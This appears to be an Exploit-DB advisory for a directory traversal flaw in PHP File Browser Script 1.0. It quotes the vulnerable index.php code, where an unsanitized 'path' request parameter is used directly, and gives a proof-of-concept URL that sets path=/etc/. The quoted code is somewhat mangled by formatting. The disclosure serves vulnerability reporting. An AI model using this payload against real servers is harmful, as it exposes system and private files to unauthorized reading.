# Exploit Title: PHP File Browser Script 1 - Directory Traversal# Dork: N/A# Date: 2018-09-03# Exploit Author: Özkan Mustafa Akkuş (AkkuS)# Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php# Software Link:https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip# Version: 1.0# Category: Webapps# Tested on: Kali linux# Description : The "index.php" is vulnerable to directory traversal.# An attacker can see and read all files known by the name# Vulnerable File: index.php<?php // line 4572$script = basename(__FILE__);// the name of this script
73$path = !empty($_REQUEST['path']) ? $_REQUEST['path']:"demo";// the path the script should access
74
75if($loc!=''){
76echo "<p id='bloc'><b>Browsing Location: </b><a href='https://www.exploit-db.com/exploits/45327/index.php'><b>".ucfirst($loc1)."</b></a>77<a href='https://www.exploit-db.com/exploits/45327/$script?path=$rpath/$loc1/$loc2'><b>".ucfirst($locdem2)."</b></a>78<a href='https://www.exploit-db.com/exploits/45327/'><b>".ucfirst($locdem3)."</b></a></p>";}
79else{
80echo "<p id='bloc'><b>Browsing Location: </b><a href='https://www.exploit-db.com/exploits/45327/'><b>Demo</b></a></p>";
?>// line 151# PoC :
https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName]# You can write the known directory name instead of [DirectoryName].# Example: '/etc/' or '/var/www/'# https://Target/scripts/php/file-browser-demo/index.php?path=/etc/
